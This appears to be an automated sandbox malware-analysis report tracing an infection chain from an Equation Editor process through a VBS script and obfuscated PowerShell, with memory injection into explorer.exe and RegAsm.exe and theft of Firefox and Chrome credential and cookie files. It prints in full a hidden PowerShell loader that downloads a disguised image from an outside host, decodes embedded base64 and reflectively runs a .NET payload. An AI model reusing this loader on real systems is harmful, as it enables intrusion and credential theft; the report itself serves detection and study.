              Source: C:\Windows\explorer.exeMemory written: PID: 3124 base: FF31B794 value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 2128 base: 95102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3196 base: 95102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3208 base: FF31B794 value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3192 base: 95102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3324 base: FF31B794 value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3388 base: 95102D value: 90Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 3352 base: FF31B794 value: 90Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 95102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 95102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 95102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 95102DJump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 95102DJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe28_2_000C1016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe28_2_000C10A5
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucwJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gbr/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))} }"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gbr/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))} }"Jump to behavior
              Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
              Source: explorer.exe, 0000000E.00000000.464565852.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 0000000E.00000000.464565852.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Managers+F
              Source: explorer.exe, 0000000E.00000000.464565852.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000D55EB cpuid 18_2_000D55EB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwQueries volume information: C:\Users\user\AppData\Roaming\rugtucw VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,18_2_00082112
              Source: C:\Windows\explorer.exeCode function: 14_2_03F13490 GetUserNameW,14_2_03F13490
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,18_2_00082198
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3192, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata-v2
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\xulstore.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\state.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\compatibility.ini
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\content-prefs.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata-v2
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\search.json.mozlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\simple-storage\store.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\mimeTypes.rdf
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\permissions.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\session-state.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\archived\2017-10\1508238380992.d07fbb40-1c13-49f0-9742-db90c57c7811.main.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SiteSecurityServiceState.txt
